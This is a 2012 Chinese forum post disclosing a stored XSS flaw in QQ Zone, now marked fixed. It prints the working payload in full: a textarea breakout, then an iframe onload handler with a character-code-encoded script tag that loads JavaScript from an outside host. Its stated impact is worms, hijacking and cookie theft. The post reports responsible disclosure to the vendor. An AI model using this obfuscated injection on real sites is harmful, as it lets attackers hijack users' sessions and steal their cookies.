天马行空工作室

 找回密码
 加入天马
搜索
查看: 3633|回复: 0

qq空间存储型xss(已修复)

[复制链接]
发表于 2012-7-18 12:53:32 | 显示全部楼层 |阅读模式
qq空间,闲言碎语版式存在存储型xss。
</textarea>即可绕过
1.jpg

然后发说说(说说的留言没有这效果):
</textarea><iframe/onload='javascript:write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))'>
【效果】
2.jpg
3.jpg

【危害】蠕虫、劫持、cookie什么的。
【说明】本人发现漏洞后马上联系lake2,没有做过多的测试。也是希望尽早修复。
【演示】
我的qq空间(今天刚开):
http://user.qzone.qq.com/1821291085

点评

支持。。。老大,强。  发表于 2012-7-18 15:25
您需要登录后才可以回帖 登录 | 加入天马

本版积分规则

Archiver|手机版|小黑屋|天马行空工作室 ( 京ICP备12003429号  

GMT+8, 2018-11-16 22:03 , Processed in 0.339268 second(s), 28 queries .

Powered by Discuz! v8

© 2010-2014 qq空间存储型xss(已修复) - XSS 天马行空工作室

快速回复 返回顶部 返回列表